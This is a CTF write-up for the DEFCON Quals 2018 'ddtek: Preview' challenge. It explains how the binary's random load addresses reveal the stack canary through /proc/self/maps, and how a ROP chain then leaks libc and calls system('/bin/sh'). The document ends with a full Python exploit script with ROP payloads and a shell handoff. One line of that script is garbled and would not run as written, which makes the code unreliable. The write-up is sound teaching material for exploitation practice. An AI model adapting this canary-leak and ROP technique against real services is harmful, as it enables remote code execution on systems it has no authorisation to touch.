DEFCON Quals 2018: "ddtek: Preview" writeup

In this challenge, we were given a binary preview, which prints the first seven lines of any file if (and only if) the file contains more than six lines. Of course the flag file contains a single line only.

The binary itself consists of two stages: the first stage (an ELF file) will “decrypt” the second stage, which is another ELF file contained in the data section, load this program as well as the runtime linker (rtld) to random addresses, and jump into the loader. The loader loads the remaining shared libraries and executes the second program normally.

First stage

The first stage binary is statically linked and doesn’t use a standard library. The _start entry function first gets a pointer to the auxiliary vectors (using the function at 0x4010e0) and to the 16 random bytes provided by the kernel. The bytes 2-8 of this string are transformed into addresses and will be used as base addresses for the program and the rtld later on. The addresses are, given that rand is the integer representing the bytes 2-8 of the randomness:

  • Address 1 (for program): ((rand0 >> 8) & 0xfffffff) << 12
  • Address 2 (for rtld): (rand0 >> 24) & ~0xfff

Additionally, everything on the stack is moved a few bytes to the lower addresses so that there is some space behind the auxiliary vectors.

At this point, the _start function jumps into some kind of main function. The function basically does the following:

  • Transform the auxv’s into a table for the values 0-0x30 (this is probably the reason why the stack was moved). The table still has the same format as the auxiliary vectors, with the difference that the entries are ordered and can be accessed by an index.
  • Decrypt the second stage
  • Load the second stage to the first address computed from the kernel-provided random
  • Set the auxiliary vectors in the table appropriately for the loaded binary
  • When required, load the ELF interpreter (rtld) to the second address computed from the kernel-provided random
  • Unmap the data section, which includes the binary file
  • Return a pointer to the new entry point, which is either the program itself or, as in this case, the ELF interpreter

Back in the _start function, a trampoline is mapped (as rwx) and allocated with some code contained in the binary, and called. The trampoline unmaps the first stage binary and jumps into the address provided by the main function.

Corollary: The first stage basically loaded the rtld and the program to addresses generated from seven bytes from the kernel-provided random bytes.

We extracted the second stage using GDB right after it was decrypted.

Second stage

At this point, we are in the second stage binary, which is (now obviously) a position-independent executable. The main function (0xfeb) essentially prints a welcome message and calls a function to handle requests (here referred to as handle_request at 0xecb) in an endless loop.

The function handle_request has a very classic stack buffer overflow - fgets is called with length 0x100 on a buffer of size 0x58. Unfortunately, the binary has stack canaries. The function basically fulfills the described functionality: open a file and print the first seven lines if it exists and has seven or more lines.

We use this to get the first seven entries of /proc/self/maps. In the way the addresses of the program and the loader are constructed, we exactly get the first bytes of the kernel randomness. These random bytes are equivalent to the stack canary, except that the lowest byte of the canary is always zero.

Now that we now the binary address and the canary, we can leak the address of the libc using a small ROP-chain calling puts with a GOT entry of the program. Finally, having the address of system and "/bin/sh", we can get our well deserved shell and cat flag.

Flag: OOO{ZOMG, WhAT iF order-of-the-overfow IS ddtek?!?!?!? Plot Twist!}

Full Exploit

#!/usr/bin/env python3

import re
import socket
from struct import unpack, pack
from subprocess import check_output
import telnetlib
from time import sleep

# pow

import struct
import hashlib

# inspired by C3CTF's POW

def pow_hash(challenge, solution):
    return hashlib.sha256(challenge.encode('ascii') + struct.pack('<Q', solution)).hexdigest()

def check_pow(challenge, n, solution):
    h = pow_hash(challenge, solution)
    return (int(h, 16) % (2**n)) == 0

def solve_pow(challenge, n):
    candidate = 0
    while True:
        if check_pow(challenge, n, candidate):
            return candidate
        candidate += 1

# !pow

def recv_until(sock, delim):
    buf = b""
    while delim not in buf: buf += sock.recv(1)
    return buf
def recv_n(sock, n):
    buf = b""
    while len(buf) != n: buf += sock.recv(n - len(buf))
    return buf

sock = socket.socket()
sock.connect(("", 31337))

print("Solving proof-of-work...")
chall = recv_until(sock, b"Solution: \n").decode()
chall ="Challenge: ([a-zA-Z0-9]+)\nn: ([0-9]+)\n", chall).groups()
proof = solve_pow(chall[0], int(chall[1]))
print(chall, proof)
sock.sendall(str(proof).encode() + b"\n")

print("Get maps...")
recv_until(sock, b"requests\n")
sock.sendall(b"HEAD /proc/self/maps\n")
maps = sock.recv(1024).decode().split("\n")[1:]
binary = int(maps[4 if "ld" in maps[0] else 0].split("-")[0], 16)
ld = int(maps[3].split("-")[0], 16)
canary = (binary >> 4) | (ld << 24)
print("binary @", hex(binary))
print("ld @", hex(ld))
print("canary =", pack("<Q", canary))

print("sending payload to get libc...")
payload1 = b"HEAD /proc/self/fsdaf\0"
payload1 += b"@" * (0x58-len(payload1)) + pack("<QQ", canary, 0xdeadbeef)
sock.sendall(payload1 + pack("<4Q", binary+0x10b3, binary+0x202020, binary+0x9e0, binary+0x103c) + b"\n")
recv_until(sock, b"Resource not found\n")
libc = unpack("<Q", recv_n(sock, 6) + b"\0\0")[0] - 0x6f690
print("libc @", hex(libc))
print("sending payload to get shell...")
sock.sendall(payload1 + pack("<3Q", binary+0x10b3, libc+0x18cd57, libc+0x45390) + b"\n")
recv_until(sock, b"Resource not found\n")

tel = telnetlib.Telnet()
tel.sock = sock

# OOO{ZOMG, WhAT iF order-of-the-overfow IS ddtek?!?!?!? Plot Twist!}